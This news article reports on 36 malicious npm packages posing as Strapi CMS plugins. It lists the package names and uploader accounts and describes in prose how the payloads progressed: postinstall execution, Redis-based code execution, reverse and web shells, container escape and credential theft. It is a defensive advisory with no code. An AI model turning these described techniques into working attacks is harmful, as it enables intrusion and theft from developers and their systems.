Cybersecurity researchers have recently unearthed a troubling discovery within the npm registry: 36 malicious packages masquerading as Strapi CMS plugins. These deceptive packages harbor various payloads aimed at exploiting Redis and PostgreSQL, deploying reverse shells, harvesting credentials, and establishing persistent implants. According to SafeDep, each package is composed of three files—package.json, index.js, and postinstall.js—lacking any descriptions, repositories, or homepages, and all use version 3.6.8 to mimic a legitimate Strapi v3 community plugin.
Malicious Package Characteristics
The identified npm packages adhere to a consistent naming convention, beginning with “strapi-plugin-” followed by terms such as “cron,” “database,” or “server,” designed to mislead developers into downloading them. In contrast, official Strapi plugins are correctly scoped under “@strapi/.”
These packages were uploaded by four sock puppet accounts—”umarbek1233,” “kekylf12,” “tikeqemif26,” and “umar_bektembiev1″—within a mere 13-hour window. The complete list of malicious packages includes:
- strapi-plugin-cron
- strapi-plugin-config
- strapi-plugin-server
- strapi-plugin-database
- strapi-plugin-core
- strapi-plugin-hooks
- strapi-plugin-monitor
- strapi-plugin-events
- strapi-plugin-logger
- strapi-plugin-health
- strapi-plugin-sync
- strapi-plugin-seed
- strapi-plugin-locale
- strapi-plugin-form
- strapi-plugin-notify
- strapi-plugin-api
- strapi-plugin-sitemap-gen
- strapi-plugin-nordica-tools
- strapi-plugin-nordica-sync
- strapi-plugin-nordica-cms
- strapi-plugin-nordica-api
- strapi-plugin-nordica-recon
- strapi-plugin-nordica-stage
- strapi-plugin-nordica-vhost
- strapi-plugin-nordica-deep
- strapi-plugin-nordica-lite
- strapi-plugin-nordica
- strapi-plugin-finseven
- strapi-plugin-hextest
- strapi-plugin-cms-tools
- strapi-plugin-content-sync
- strapi-plugin-debug-tools
- strapi-plugin-health-check
- strapi-plugin-guardarian-ext
- strapi-plugin-advanced-uuid
- strapi-plugin-blurhash
Analysis of these packages reveals that the malicious code is embedded within the postinstall script hook, which executes automatically upon “npm install” without requiring user interaction. This execution occurs with the same privileges as the installing user, thereby exploiting root access within CI/CD environments and Docker containers.
Payload Evolution
The evolution of the payloads associated with this campaign illustrates a clear trajectory:
- The initial payload weaponizes a locally accessible Redis instance for remote code execution, injecting a crontab entry that downloads and executes a shell script from a remote server every minute. This script writes a PHP web shell and a Node.js reverse shell into Strapi’s public uploads directory while scanning for sensitive data such as Elasticsearch and cryptocurrency wallet seed phrases.
- Subsequent payloads combine Redis exploitation with Docker container escape techniques, allowing attackers to write shell payloads to the host outside the container and launch a direct Python reverse shell.
- Further iterations deploy reverse shells and utilize Redis to execute downloaded files.
- System scans for environment variables and PostgreSQL database connection strings are conducted, alongside expanded credential harvesting and reconnaissance activities.
- Direct PostgreSQL database exploitation is attempted using hard-coded credentials, querying Strapi-specific tables for secrets, and dumping cryptocurrency-related patterns.
- Finally, a persistent implant is deployed to maintain remote access to a specific hostname (“prod-strapi”).
- Credential theft is facilitated through scanning hard-coded paths and establishing a persistent reverse shell.
SafeDep notes that the progression of these payloads indicates a strategic shift by the attacker, moving from aggressive exploitation tactics to reconnaissance and data collection, ultimately settling on persistent access and targeted credential theft. The nature of these payloads, particularly the focus on digital assets and the use of hard-coded database credentials, suggests that this campaign may have been a targeted attack against a cryptocurrency platform. Users who have installed any of the aforementioned packages are strongly advised to assume compromise and rotate all credentials.
Wider Context of Supply Chain Attacks
This discovery aligns with a broader trend of supply chain attacks targeting the open-source ecosystem. Recent incidents include:
- A GitHub account named “ezmtebo” that submitted over 256 pull requests across various open-source repositories, embedding a credential exfiltration payload.
- The hijacking of “dev-protocol,” distributing malicious Polymarket trading bots with typosquatted npm dependencies that steal wallet private keys.
- Exploitation of the popular Emacs package “kubernetes-el/kubernetes-el,” which leveraged a vulnerability in its GitHub Actions workflow to exfiltrate CI/CD secrets.
- Compromise of the legitimate “xygeni/xygeni-action” GitHub Actions workflow, where stolen maintainer credentials were used to plant a reverse shell backdoor.
- Multiple versions of the “KhangNghiem/fast-draft” VS Code extension that executed a downloader to deploy a second-stage RAT from a GitHub repository.
In a report published in February 2026, Group-IB highlighted that software supply chain attacks have emerged as a dominant force reshaping the global cyber threat landscape. These attacks target trusted vendors, open-source software, SaaS platforms, and managed service providers, allowing threat actors to gain inherited access to numerous downstream organizations. The rapid escalation of localized intrusions into large-scale, cross-border impacts underscores the urgency of addressing these vulnerabilities.
